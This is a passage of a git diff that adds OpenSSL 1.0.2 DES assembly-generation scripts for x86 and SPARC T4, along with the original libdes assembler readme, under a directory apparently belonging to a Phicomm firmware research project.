+	.word	0x00000204, 0x00004000, 0x01004204, 0x01000000
+	.word	0x01004200, 0x00000004, 0x00004004, 0x01004204
+	.word	0x01000004, 0x01004200, 0x01004000, 0x00004004
+	! nibble 7
+	.word	0x20800080, 0x20820000, 0x00020080, 0x00000000
+	.word	0x20020000, 0x00800080, 0x20800000, 0x20820080
+	.word	0x00000080, 0x20000000, 0x00820000, 0x00020080
+	.word	0x00820080, 0x20020080, 0x20000080, 0x20800000
+	.word	0x00020000, 0x00820080, 0x00800080, 0x20020000
+	.word	0x20820080, 0x20000080, 0x00000000, 0x00820000
+	.word	0x20000000, 0x00800000, 0x20020080, 0x20800080
+	.word	0x00800000, 0x00020000, 0x20820000, 0x00000080
+	.word	0x00800000, 0x00020000, 0x20000080, 0x20820080
+	.word	0x00020080, 0x20000000, 0x00000000, 0x00820000
+	.word	0x20800080, 0x20020080, 0x20020000, 0x00800080
+	.word	0x20820000, 0x00000080, 0x00800080, 0x20020000
+	.word	0x20820080, 0x00800000, 0x20800000, 0x20000080
+	.word	0x00820000, 0x00020080, 0x20020080, 0x20800000
+	.word	0x00000080, 0x20820000, 0x00820080, 0x00000000
+	.word	0x20000000, 0x20800080, 0x00020000, 0x00820080
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/desboth.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/desboth.pl
new file mode 100644
index 0000000..eec0088
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/desboth.pl
@@ -0,0 +1,79 @@
+#!/usr/local/bin/perl
+
+$L="edi";
+$R="esi";
+
+sub DES_encrypt3
+	{
+	local($name,$enc)=@_;
+
+	&function_begin_B($name,"");
+	&push("ebx");
+	&mov("ebx",&wparam(0));
+
+	&push("ebp");
+	&push("esi");
+
+	&push("edi");
+
+	&comment("");
+	&comment("Load the data words");
+	&mov($L,&DWP(0,"ebx","",0));
+	&mov($R,&DWP(4,"ebx","",0));
+	&stack_push(3);
+
+	&comment("");
+	&comment("IP");
+	&IP_new($L,$R,"edx",0);
+
+	# put them back
+	
+	if ($enc)
+		{
+		&mov(&DWP(4,"ebx","",0),$R);
+		 &mov("eax",&wparam(1));
+		&mov(&DWP(0,"ebx","",0),"edx");
+		 &mov("edi",&wparam(2));
+		 &mov("esi",&wparam(3));
+		}
+	else
+		{
+		&mov(&DWP(4,"ebx","",0),$R);
+		 &mov("esi",&wparam(1));
+		&mov(&DWP(0,"ebx","",0),"edx");
+		 &mov("edi",&wparam(2));
+		 &mov("eax",&wparam(3));
+		}
+	&mov(&swtmp(2),	(DWC(($enc)?"1":"0")));
+	&mov(&swtmp(1),	"eax");
+	&mov(&swtmp(0),	"ebx");
+	&call("DES_encrypt2");
+	&mov(&swtmp(2),	(DWC(($enc)?"0":"1")));
+	&mov(&swtmp(1),	"edi");
+	&mov(&swtmp(0),	"ebx");
+	&call("DES_encrypt2");
+	&mov(&swtmp(2),	(DWC(($enc)?"1":"0")));
+	&mov(&swtmp(1),	"esi");
+	&mov(&swtmp(0),	"ebx");
+	&call("DES_encrypt2");
+
+	&stack_pop(3);
+	&mov($L,&DWP(0,"ebx","",0));
+	&mov($R,&DWP(4,"ebx","",0));
+
+	&comment("");
+	&comment("FP");
+	&FP_new($L,$R,"eax",0);
+
+	&mov(&DWP(0,"ebx","",0),"eax");
+	&mov(&DWP(4,"ebx","",0),$R);
+
+	&pop("edi");
+	&pop("esi");
+	&pop("ebp");
+	&pop("ebx");
+	&ret();
+	&function_end_B($name);
+	}
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/dest4-sparcv9.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/dest4-sparcv9.pl
new file mode 100644
index 0000000..1dc6024
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/dest4-sparcv9.pl
@@ -0,0 +1,617 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by David S. Miller <davem@devemloft.net> and Andy Polyakov
+# <appro@openssl.org>. The module is licensed under 2-clause BSD
+# license. March 2013. All rights reserved.
+# ====================================================================
+
+######################################################################
+# DES for SPARC T4.
+#
+# As with other hardware-assisted ciphers CBC encrypt results [for
+# aligned data] are virtually identical to critical path lengths:
+#
+#		DES		Triple-DES
+# CBC encrypt	4.14/4.15(*)	11.7/11.7
+# CBC decrypt	1.77/4.11(**)	6.42/7.47
+#
+#			 (*)	numbers after slash are for
+#				misaligned data;
+#			 (**)	this is result for largest
+#				block size, unlike all other
+#				cases smaller blocks results
+#				are better[?];
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "sparcv9_modes.pl";
+
+&asm_init(@ARGV);
+
+$code.=<<___ if ($::abibits==64);
+.register       %g2,#scratch
+.register       %g3,#scratch
+___
+
+$code.=<<___;
+.text
+___
+
+{ my ($inp,$out)=("%o0","%o1");
+
+$code.=<<___;
+.align	32
+.globl	des_t4_key_expand
+.type	des_t4_key_expand,#function
+des_t4_key_expand:
+	andcc		$inp, 0x7, %g0
+	alignaddr	$inp, %g0, $inp
+	bz,pt		%icc, 1f
+	ldd		[$inp + 0x00], %f0
+	ldd		[$inp + 0x08], %f2
+	faligndata	%f0, %f2, %f0
+1:	des_kexpand	%f0, 0, %f0
+	des_kexpand	%f0, 1, %f2
+	std		%f0, [$out + 0x00]
+	des_kexpand	%f2, 3, %f6
+	std		%f2, [$out + 0x08]
+	des_kexpand	%f2, 2, %f4
+	des_kexpand	%f6, 3, %f10
+	std		%f6, [$out + 0x18]
+	des_kexpand	%f6, 2, %f8
+	std		%f4, [$out + 0x10]
+	des_kexpand	%f10, 3, %f14
+	std		%f10, [$out + 0x28]
+	des_kexpand	%f10, 2, %f12
+	std		%f8, [$out + 0x20]
+	des_kexpand	%f14, 1, %f16
+	std		%f14, [$out + 0x38]
+	des_kexpand	%f16, 3, %f20
+	std		%f12, [$out + 0x30]
+	des_kexpand	%f16, 2, %f18
+	std		%f16, [$out + 0x40]
+	des_kexpand	%f20, 3, %f24
+	std		%f20, [$out + 0x50]
+	des_kexpand	%f20, 2, %f22
+	std		%f18, [$out + 0x48]
+	des_kexpand	%f24, 3, %f28
+	std		%f24, [$out + 0x60]
+	des_kexpand	%f24, 2, %f26
+	std		%f22, [$out + 0x58]
+	des_kexpand	%f28, 1, %f30
+	std		%f28, [$out + 0x70]
+	std		%f26, [$out + 0x68]
+	retl
+	std		%f30, [$out + 0x78]
+.size	des_t4_key_expand,.-des_t4_key_expand
+___
+}
+{ my ($inp,$out,$len,$key,$ivec) = map("%o$_",(0..4));
+  my ($ileft,$iright,$omask) = map("%g$_",(1..3));
+
+$code.=<<___;
+.globl	des_t4_cbc_encrypt
+.align	32
+des_t4_cbc_encrypt:
+	cmp		$len, 0
+	be,pn		$::size_t_cc, .Lcbc_abort
+	nop
+	ld		[$ivec + 0], %f0	! load ivec
+	ld		[$ivec + 4], %f1
+
+	and		$inp, 7, $ileft
+	andn		$inp, 7, $inp
+	sll		$ileft, 3, $ileft
+	mov		0xff, $omask
+	prefetch	[$inp], 20
+	prefetch	[$inp + 63], 20
+	sub		%g0, $ileft, $iright
+	and		$out, 7, %g4
+	alignaddrl	$out, %g0, $out
+	srl		$omask, %g4, $omask
+	srlx		$len, 3, $len
+	movrz		%g4, 0, $omask
+	prefetch	[$out], 22
+
+	ldd		[$key + 0x00], %f4	! load key schedule
+	ldd		[$key + 0x08], %f6
+	ldd		[$key + 0x10], %f8
+	ldd		[$key + 0x18], %f10
+	ldd		[$key + 0x20], %f12
+	ldd		[$key + 0x28], %f14
+	ldd		[$key + 0x30], %f16
+	ldd		[$key + 0x38], %f18
+	ldd		[$key + 0x40], %f20
+	ldd		[$key + 0x48], %f22
+	ldd		[$key + 0x50], %f24
+	ldd		[$key + 0x58], %f26
+	ldd		[$key + 0x60], %f28
+	ldd		[$key + 0x68], %f30
+	ldd		[$key + 0x70], %f32
+	ldd		[$key + 0x78], %f34
+
+.Ldes_cbc_enc_loop:
+	ldx		[$inp + 0], %g4
+	brz,pt		$ileft, 4f
+	nop
+
+	ldx		[$inp + 8], %g5
+	sllx		%g4, $ileft, %g4
+	srlx		%g5, $iright, %g5
+	or		%g5, %g4, %g4
+4:
+	movxtod		%g4, %f2
+	prefetch	[$inp + 8+63], 20
+	add		$inp, 8, $inp
+	fxor		%f2, %f0, %f0		! ^= ivec
+	prefetch	[$out + 63], 22
+
+	des_ip		%f0, %f0
+	des_round	%f4, %f6, %f0, %f0
+	des_round	%f8, %f10, %f0, %f0
+	des_round	%f12, %f14, %f0, %f0
+	des_round	%f16, %f18, %f0, %f0
+	des_round	%f20, %f22, %f0, %f0
+	des_round	%f24, %f26, %f0, %f0
+	des_round	%f28, %f30, %f0, %f0
+	des_round	%f32, %f34, %f0, %f0
+	des_iip		%f0, %f0
+
+	brnz,pn		$omask, 2f
+	sub		$len, 1, $len
+
+	std		%f0, [$out + 0]
+	brnz,pt		$len, .Ldes_cbc_enc_loop
+	add		$out, 8, $out
+
+	st		%f0, [$ivec + 0]	! write out ivec
+	retl
+	st		%f1, [$ivec + 4]
+.Lcbc_abort:
+	retl
+	nop
+
+.align	16
+2:	ldxa		[$inp]0x82, %g4		! avoid read-after-write hazard
+						! and ~4x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f2		! handle unaligned output
+
+	stda		%f2, [$out + $omask]0xc0	! partial store
+	add		$out, 8, $out
+	orn		%g0, $omask, $omask
+	stda		%f2, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .Ldes_cbc_enc_loop+4
+	orn		%g0, $omask, $omask
+
+	st		%f0, [$ivec + 0]	! write out ivec
+	retl
+	st		%f1, [$ivec + 4]
+.type	des_t4_cbc_encrypt,#function
+.size	des_t4_cbc_encrypt,.-des_t4_cbc_encrypt
+
+.globl	des_t4_cbc_decrypt
+.align	32
+des_t4_cbc_decrypt:
+	cmp		$len, 0
+	be,pn		$::size_t_cc, .Lcbc_abort
+	nop
+	ld		[$ivec + 0], %f2	! load ivec
+	ld		[$ivec + 4], %f3
+
+	and		$inp, 7, $ileft
+	andn		$inp, 7, $inp
+	sll		$ileft, 3, $ileft
+	mov		0xff, $omask
+	prefetch	[$inp], 20
+	prefetch	[$inp + 63], 20
+	sub		%g0, $ileft, $iright
+	and		$out, 7, %g4
+	alignaddrl	$out, %g0, $out
+	srl		$omask, %g4, $omask
+	srlx		$len, 3, $len
+	movrz		%g4, 0, $omask
+	prefetch	[$out], 22
+
+	ldd		[$key + 0x78], %f4	! load key schedule
+	ldd		[$key + 0x70], %f6
+	ldd		[$key + 0x68], %f8
+	ldd		[$key + 0x60], %f10
+	ldd		[$key + 0x58], %f12
+	ldd		[$key + 0x50], %f14
+	ldd		[$key + 0x48], %f16
+	ldd		[$key + 0x40], %f18
+	ldd		[$key + 0x38], %f20
+	ldd		[$key + 0x30], %f22
+	ldd		[$key + 0x28], %f24
+	ldd		[$key + 0x20], %f26
+	ldd		[$key + 0x18], %f28
+	ldd		[$key + 0x10], %f30
+	ldd		[$key + 0x08], %f32
+	ldd		[$key + 0x00], %f34
+
+.Ldes_cbc_dec_loop:
+	ldx		[$inp + 0], %g4
+	brz,pt		$ileft, 4f
+	nop
+
+	ldx		[$inp + 8], %g5
+	sllx		%g4, $ileft, %g4
+	srlx		%g5, $iright, %g5
+	or		%g5, %g4, %g4
+4:
+	movxtod		%g4, %f0
+	prefetch	[$inp + 8+63], 20
+	add		$inp, 8, $inp
+	prefetch	[$out + 63], 22
+
+	des_ip		%f0, %f0
+	des_round	%f4, %f6, %f0, %f0
+	des_round	%f8, %f10, %f0, %f0
+	des_round	%f12, %f14, %f0, %f0
+	des_round	%f16, %f18, %f0, %f0
+	des_round	%f20, %f22, %f0, %f0
+	des_round	%f24, %f26, %f0, %f0
+	des_round	%f28, %f30, %f0, %f0
+	des_round	%f32, %f34, %f0, %f0
+	des_iip		%f0, %f0
+
+	fxor		%f2, %f0, %f0		! ^= ivec
+	movxtod		%g4, %f2
+
+	brnz,pn		$omask, 2f
+	sub		$len, 1, $len
+
+	std		%f0, [$out + 0]
+	brnz,pt		$len, .Ldes_cbc_dec_loop
+	add		$out, 8, $out
+
+	st		%f2, [$ivec + 0]	! write out ivec
+	retl
+	st		%f3, [$ivec + 4]
+
+.align	16
+2:	ldxa		[$inp]0x82, %g4		! avoid read-after-write hazard
+						! and ~4x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f0		! handle unaligned output
+
+	stda		%f0, [$out + $omask]0xc0	! partial store
+	add		$out, 8, $out
+	orn		%g0, $omask, $omask
+	stda		%f0, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .Ldes_cbc_dec_loop+4
+	orn		%g0, $omask, $omask
+
+	st		%f2, [$ivec + 0]	! write out ivec
+	retl
+	st		%f3, [$ivec + 4]
+.type	des_t4_cbc_decrypt,#function
+.size	des_t4_cbc_decrypt,.-des_t4_cbc_decrypt
+___
+
+# One might wonder why does one have back-to-back des_iip/des_ip
+# pairs between EDE passes. Indeed, aren't they inverse of each other?
+# They almost are. Outcome of the pair is 32-bit words being swapped
+# in target register. Consider pair of des_iip/des_ip as a way to
+# perform the due swap, it's actually fastest way in this case.
+
+$code.=<<___;
+.globl	des_t4_ede3_cbc_encrypt
+.align	32
+des_t4_ede3_cbc_encrypt:
+	cmp		$len, 0
+	be,pn		$::size_t_cc, .Lcbc_abort
+	nop
+	ld		[$ivec + 0], %f0	! load ivec
+	ld		[$ivec + 4], %f1
+
+	and		$inp, 7, $ileft
+	andn		$inp, 7, $inp
+	sll		$ileft, 3, $ileft
+	mov		0xff, $omask
+	prefetch	[$inp], 20
+	prefetch	[$inp + 63], 20
+	sub		%g0, $ileft, $iright
+	and		$out, 7, %g4
+	alignaddrl	$out, %g0, $out
+	srl		$omask, %g4, $omask
+	srlx		$len, 3, $len
+	movrz		%g4, 0, $omask
+	prefetch	[$out], 22
+
+	ldd		[$key + 0x00], %f4	! load key schedule
+	ldd		[$key + 0x08], %f6
+	ldd		[$key + 0x10], %f8
+	ldd		[$key + 0x18], %f10
+	ldd		[$key + 0x20], %f12
+	ldd		[$key + 0x28], %f14
+	ldd		[$key + 0x30], %f16
+	ldd		[$key + 0x38], %f18
+	ldd		[$key + 0x40], %f20
+	ldd		[$key + 0x48], %f22
+	ldd		[$key + 0x50], %f24
+	ldd		[$key + 0x58], %f26
+	ldd		[$key + 0x60], %f28
+	ldd		[$key + 0x68], %f30
+	ldd		[$key + 0x70], %f32
+	ldd		[$key + 0x78], %f34
+
+.Ldes_ede3_cbc_enc_loop:
+	ldx		[$inp + 0], %g4
+	brz,pt		$ileft, 4f
+	nop
+
+	ldx		[$inp + 8], %g5
+	sllx		%g4, $ileft, %g4
+	srlx		%g5, $iright, %g5
+	or		%g5, %g4, %g4
+4:
+	movxtod		%g4, %f2
+	prefetch	[$inp + 8+63], 20
+	add		$inp, 8, $inp
+	fxor		%f2, %f0, %f0		! ^= ivec
+	prefetch	[$out + 63], 22
+
+	des_ip		%f0, %f0
+	des_round	%f4, %f6, %f0, %f0
+	des_round	%f8, %f10, %f0, %f0
+	des_round	%f12, %f14, %f0, %f0
+	des_round	%f16, %f18, %f0, %f0
+	ldd		[$key + 0x100-0x08], %f36
+	ldd		[$key + 0x100-0x10], %f38
+	des_round	%f20, %f22, %f0, %f0
+	ldd		[$key + 0x100-0x18], %f40
+	ldd		[$key + 0x100-0x20], %f42
+	des_round	%f24, %f26, %f0, %f0
+	ldd		[$key + 0x100-0x28], %f44
+	ldd		[$key + 0x100-0x30], %f46
+	des_round	%f28, %f30, %f0, %f0
+	ldd		[$key + 0x100-0x38], %f48
+	ldd		[$key + 0x100-0x40], %f50
+	des_round	%f32, %f34, %f0, %f0
+	ldd		[$key + 0x100-0x48], %f52
+	ldd		[$key + 0x100-0x50], %f54
+	des_iip		%f0, %f0
+
+	ldd		[$key + 0x100-0x58], %f56
+	ldd		[$key + 0x100-0x60], %f58
+	des_ip		%f0, %f0
+	ldd		[$key + 0x100-0x68], %f60
+	ldd		[$key + 0x100-0x70], %f62
+	des_round	%f36, %f38, %f0, %f0
+	ldd		[$key + 0x100-0x78], %f36
+	ldd		[$key + 0x100-0x80], %f38
+	des_round	%f40, %f42, %f0, %f0
+	des_round	%f44, %f46, %f0, %f0
+	des_round	%f48, %f50, %f0, %f0
+	ldd		[$key + 0x100+0x00], %f40
+	ldd		[$key + 0x100+0x08], %f42
+	des_round	%f52, %f54, %f0, %f0
+	ldd		[$key + 0x100+0x10], %f44
+	ldd		[$key + 0x100+0x18], %f46
+	des_round	%f56, %f58, %f0, %f0
+	ldd		[$key + 0x100+0x20], %f48
+	ldd		[$key + 0x100+0x28], %f50
+	des_round	%f60, %f62, %f0, %f0
+	ldd		[$key + 0x100+0x30], %f52
+	ldd		[$key + 0x100+0x38], %f54
+	des_round	%f36, %f38, %f0, %f0
+	ldd		[$key + 0x100+0x40], %f56
+	ldd		[$key + 0x100+0x48], %f58
+	des_iip		%f0, %f0
+
+	ldd		[$key + 0x100+0x50], %f60
+	ldd		[$key + 0x100+0x58], %f62
+	des_ip		%f0, %f0
+	ldd		[$key + 0x100+0x60], %f36
+	ldd		[$key + 0x100+0x68], %f38
+	des_round	%f40, %f42, %f0, %f0
+	ldd		[$key + 0x100+0x70], %f40
+	ldd		[$key + 0x100+0x78], %f42
+	des_round	%f44, %f46, %f0, %f0
+	des_round	%f48, %f50, %f0, %f0
+	des_round	%f52, %f54, %f0, %f0
+	des_round	%f56, %f58, %f0, %f0
+	des_round	%f60, %f62, %f0, %f0
+	des_round	%f36, %f38, %f0, %f0
+	des_round	%f40, %f42, %f0, %f0
+	des_iip		%f0, %f0
+
+	brnz,pn		$omask, 2f
+	sub		$len, 1, $len
+
+	std		%f0, [$out + 0]
+	brnz,pt		$len, .Ldes_ede3_cbc_enc_loop
+	add		$out, 8, $out
+
+	st		%f0, [$ivec + 0]	! write out ivec
+	retl
+	st		%f1, [$ivec + 4]
+
+.align	16
+2:	ldxa		[$inp]0x82, %g4		! avoid read-after-write hazard
+						! and ~2x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f2		! handle unaligned output
+
+	stda		%f2, [$out + $omask]0xc0	! partial store
+	add		$out, 8, $out
+	orn		%g0, $omask, $omask
+	stda		%f2, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .Ldes_ede3_cbc_enc_loop+4
+	orn		%g0, $omask, $omask
+
+	st		%f0, [$ivec + 0]	! write out ivec
+	retl
+	st		%f1, [$ivec + 4]
+.type	des_t4_ede3_cbc_encrypt,#function
+.size	des_t4_ede3_cbc_encrypt,.-des_t4_ede3_cbc_encrypt
+
+.globl	des_t4_ede3_cbc_decrypt
+.align	32
+des_t4_ede3_cbc_decrypt:
+	cmp		$len, 0
+	be,pn		$::size_t_cc, .Lcbc_abort
+	nop
+	ld		[$ivec + 0], %f2	! load ivec
+	ld		[$ivec + 4], %f3
+
+	and		$inp, 7, $ileft
+	andn		$inp, 7, $inp
+	sll		$ileft, 3, $ileft
+	mov		0xff, $omask
+	prefetch	[$inp], 20
+	prefetch	[$inp + 63], 20
+	sub		%g0, $ileft, $iright
+	and		$out, 7, %g4
+	alignaddrl	$out, %g0, $out
+	srl		$omask, %g4, $omask
+	srlx		$len, 3, $len
+	movrz		%g4, 0, $omask
+	prefetch	[$out], 22
+
+	ldd		[$key + 0x100+0x78], %f4	! load key schedule
+	ldd		[$key + 0x100+0x70], %f6
+	ldd		[$key + 0x100+0x68], %f8
+	ldd		[$key + 0x100+0x60], %f10
+	ldd		[$key + 0x100+0x58], %f12
+	ldd		[$key + 0x100+0x50], %f14
+	ldd		[$key + 0x100+0x48], %f16
+	ldd		[$key + 0x100+0x40], %f18
+	ldd		[$key + 0x100+0x38], %f20
+	ldd		[$key + 0x100+0x30], %f22
+	ldd		[$key + 0x100+0x28], %f24
+	ldd		[$key + 0x100+0x20], %f26
+	ldd		[$key + 0x100+0x18], %f28
+	ldd		[$key + 0x100+0x10], %f30
+	ldd		[$key + 0x100+0x08], %f32
+	ldd		[$key + 0x100+0x00], %f34
+
+.Ldes_ede3_cbc_dec_loop:
+	ldx		[$inp + 0], %g4
+	brz,pt		$ileft, 4f
+	nop
+
+	ldx		[$inp + 8], %g5
+	sllx		%g4, $ileft, %g4
+	srlx		%g5, $iright, %g5
+	or		%g5, %g4, %g4
+4:
+	movxtod		%g4, %f0
+	prefetch	[$inp + 8+63], 20
+	add		$inp, 8, $inp
+	prefetch	[$out + 63], 22
+
+	des_ip		%f0, %f0
+	des_round	%f4, %f6, %f0, %f0
+	des_round	%f8, %f10, %f0, %f0
+	des_round	%f12, %f14, %f0, %f0
+	des_round	%f16, %f18, %f0, %f0
+	ldd		[$key + 0x80+0x00], %f36
+	ldd		[$key + 0x80+0x08], %f38
+	des_round	%f20, %f22, %f0, %f0
+	ldd		[$key + 0x80+0x10], %f40
+	ldd		[$key + 0x80+0x18], %f42
+	des_round	%f24, %f26, %f0, %f0
+	ldd		[$key + 0x80+0x20], %f44
+	ldd		[$key + 0x80+0x28], %f46
+	des_round	%f28, %f30, %f0, %f0
+	ldd		[$key + 0x80+0x30], %f48
+	ldd		[$key + 0x80+0x38], %f50
+	des_round	%f32, %f34, %f0, %f0
+	ldd		[$key + 0x80+0x40], %f52
+	ldd		[$key + 0x80+0x48], %f54
+	des_iip		%f0, %f0
+
+	ldd		[$key + 0x80+0x50], %f56
+	ldd		[$key + 0x80+0x58], %f58
+	des_ip		%f0, %f0
+	ldd		[$key + 0x80+0x60], %f60
+	ldd		[$key + 0x80+0x68], %f62
+	des_round	%f36, %f38, %f0, %f0
+	ldd		[$key + 0x80+0x70], %f36
+	ldd		[$key + 0x80+0x78], %f38
+	des_round	%f40, %f42, %f0, %f0
+	des_round	%f44, %f46, %f0, %f0
+	des_round	%f48, %f50, %f0, %f0
+	ldd		[$key + 0x80-0x08], %f40
+	ldd		[$key + 0x80-0x10], %f42
+	des_round	%f52, %f54, %f0, %f0
+	ldd		[$key + 0x80-0x18], %f44
+	ldd		[$key + 0x80-0x20], %f46
+	des_round	%f56, %f58, %f0, %f0
+	ldd		[$key + 0x80-0x28], %f48
+	ldd		[$key + 0x80-0x30], %f50
+	des_round	%f60, %f62, %f0, %f0
+	ldd		[$key + 0x80-0x38], %f52
+	ldd		[$key + 0x80-0x40], %f54
+	des_round	%f36, %f38, %f0, %f0
+	ldd		[$key + 0x80-0x48], %f56
+	ldd		[$key + 0x80-0x50], %f58
+	des_iip		%f0, %f0
+
+	ldd		[$key + 0x80-0x58], %f60
+	ldd		[$key + 0x80-0x60], %f62
+	des_ip		%f0, %f0
+	ldd		[$key + 0x80-0x68], %f36
+	ldd		[$key + 0x80-0x70], %f38
+	des_round	%f40, %f42, %f0, %f0
+	ldd		[$key + 0x80-0x78], %f40
+	ldd		[$key + 0x80-0x80], %f42
+	des_round	%f44, %f46, %f0, %f0
+	des_round	%f48, %f50, %f0, %f0
+	des_round	%f52, %f54, %f0, %f0
+	des_round	%f56, %f58, %f0, %f0
+	des_round	%f60, %f62, %f0, %f0
+	des_round	%f36, %f38, %f0, %f0
+	des_round	%f40, %f42, %f0, %f0
+	des_iip		%f0, %f0
+
+	fxor		%f2, %f0, %f0		! ^= ivec
+	movxtod		%g4, %f2
+
+	brnz,pn		$omask, 2f
+	sub		$len, 1, $len
+
+	std		%f0, [$out + 0]
+	brnz,pt		$len, .Ldes_ede3_cbc_dec_loop
+	add		$out, 8, $out
+
+	st		%f2, [$ivec + 0]	! write out ivec
+	retl
+	st		%f3, [$ivec + 4]
+
+.align	16
+2:	ldxa		[$inp]0x82, %g4		! avoid read-after-write hazard
+						! and ~3x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f0		! handle unaligned output
+
+	stda		%f0, [$out + $omask]0xc0	! partial store
+	add		$out, 8, $out
+	orn		%g0, $omask, $omask
+	stda		%f0, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .Ldes_ede3_cbc_dec_loop+4
+	orn		%g0, $omask, $omask
+
+	st		%f2, [$ivec + 0]	! write out ivec
+	retl
+	st		%f3, [$ivec + 4]
+.type	des_t4_ede3_cbc_decrypt,#function
+.size	des_t4_ede3_cbc_decrypt,.-des_t4_ede3_cbc_decrypt
+___
+}
+$code.=<<___;
+.asciz  "DES for SPARC T4, David S. Miller, Andy Polyakov"
+.align  4
+___
+
+&emit_assembler();
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/readme b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/readme
new file mode 100644
index 0000000..1beafe2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/readme
@@ -0,0 +1,131 @@
+First up, let me say I don't like writing in assembler.  It is not portable,
+dependant on the particular CPU architecture release and is generally a pig
+to debug and get right.  Having said that, the x86 architecture is probably
+the most important for speed due to number of boxes and since
+it appears to be the worst architecture to to get
+good C compilers for.  So due to this, I have lowered myself to do
+assembler for the inner DES routines in libdes :-).
+
+The file to implement in assembler is des_enc.c.  Replace the following
+4 functions
+des_encrypt1(DES_LONG data[2],des_key_schedule ks, int encrypt);
+des_encrypt2(DES_LONG data[2],des_key_schedule ks, int encrypt);
+des_encrypt3(DES_LONG data[2],des_key_schedule ks1,ks2,ks3);
+des_decrypt3(DES_LONG data[2],des_key_schedule ks1,ks2,ks3);
+
+They encrypt/decrypt the 64 bits held in 'data' using
+the 'ks' key schedules.   The only difference between the 4 functions is that
+des_encrypt2() does not perform IP() or FP() on the data (this is an
+optimization for when doing triple DES and des_encrypt3() and des_decrypt3()
+perform triple des.  The triple DES routines are in here because it does
+make a big difference to have them located near the des_encrypt2 function
+at link time..
+
+Now as we all know, there are lots of different operating systems running on
+x86 boxes, and unfortunately they normally try to make sure their assembler
+formating is not the same as the other peoples.
+The 4 main formats I know of are
+Microsoft	Windows 95/Windows NT
+Elf		Includes Linux and FreeBSD(?).
+a.out		The older Linux.
+Solaris		Same as Elf but different comments :-(.
+
+Now I was not overly keen to write 4 different copies of the same code,
+so I wrote a few perl routines to output the correct assembler, given
+a target assembler type.  This code is ugly and is just a hack.
+The libraries are x86unix.pl and x86ms.pl.
+des586.pl, des686.pl and des-som[23].pl are the programs to actually
+generate the assembler.
+
+So to generate elf assembler
+perl des-som3.pl elf >dx86-elf.s
+For Windows 95/NT
+perl des-som2.pl win32 >win32.asm
+
+[ update 4 Jan 1996 ]
+I have added another way to do things.
+perl des-som3.pl cpp >dx86-cpp.s
+generates a file that will be included by dx86unix.cpp when it is compiled.
+To build for elf, a.out, solaris, bsdi etc,
+cc -E -DELF asm/dx86unix.cpp | as -o asm/dx86-elf.o
+cc -E -DSOL asm/dx86unix.cpp | as -o asm/dx86-sol.o
+cc -E -DOUT asm/dx86unix.cpp | as -o asm/dx86-out.o
+cc -E -DBSDI asm/dx86unix.cpp | as -o asm/dx86bsdi.o
+This was done to cut down the number of files in the distribution.
+
+Now the ugly part.  I acquired my copy of Intels
+"Optimization's For Intel's 32-Bit Processors" and found a few interesting
+things.  First, the aim of the exersize is to 'extract' one byte at a time
+from a word and do an array lookup.  This involves getting the byte from
+the 4 locations in the word and moving it to a new word and doing the lookup.
+The most obvious way to do this is
+xor	eax,	eax				# clear word
+movb	al,	cl				# get low byte
+xor	edi	DWORD PTR 0x100+des_SP[eax] 	# xor in word
+movb	al,	ch				# get next byte
+xor	edi	DWORD PTR 0x300+des_SP[eax] 	# xor in word
+shr	ecx	16
+which seems ok.  For the pentium, this system appears to be the best.
+One has to do instruction interleaving to keep both functional units
+operating, but it is basically very efficient.
+
+Now the crunch.  When a full register is used after a partial write, eg.
+mov	al,	cl
+xor	edi,	DWORD PTR 0x100+des_SP[eax]
+386	- 1 cycle stall
+486	- 1 cycle stall
+586	- 0 cycle stall
+686	- at least 7 cycle stall (page 22 of the above mentioned document).
+
+So the technique that produces the best results on a pentium, according to
+the documentation, will produce hideous results on a pentium pro.
+
+To get around this, des686.pl will generate code that is not as fast on
+a pentium, should be very good on a pentium pro.
+mov	eax,	ecx				# copy word 
+shr	ecx,	8				# line up next byte
+and	eax,	0fch				# mask byte
+xor	edi	DWORD PTR 0x100+des_SP[eax] 	# xor in array lookup
+mov	eax,	ecx				# get word
+shr	ecx	8				# line up next byte
+and	eax,	0fch				# mask byte
+xor	edi	DWORD PTR 0x300+des_SP[eax] 	# xor in array lookup
+
+Due to the execution units in the pentium, this actually works quite well.
+For a pentium pro it should be very good.  This is the type of output
+Visual C++ generates.
+
+There is a third option.  instead of using
+mov	al,	ch
+which is bad on the pentium pro, one may be able to use
+movzx	eax,	ch
+which may not incur the partial write penalty.  On the pentium,
+this instruction takes 4 cycles so is not worth using but on the
+pentium pro it appears it may be worth while.  I need access to one to
+experiment :-).
+
+eric (20 Oct 1996)
+
+22 Nov 1996 - I have asked people to run the 2 different version on pentium
+pros and it appears that the intel documentation is wrong.  The
+mov al,bh is still faster on a pentium pro, so just use the des586.pl
+install des686.pl
+
+3 Dec 1996 - I added des_encrypt3/des_decrypt3 because I have moved these
+functions into des_enc.c because it does make a massive performance
+difference on some boxes to have the functions code located close to
+the des_encrypt2() function.
+
+9 Jan 1997 - des-som2.pl is now the correct perl script to use for
+pentiums.  It contains an inner loop from
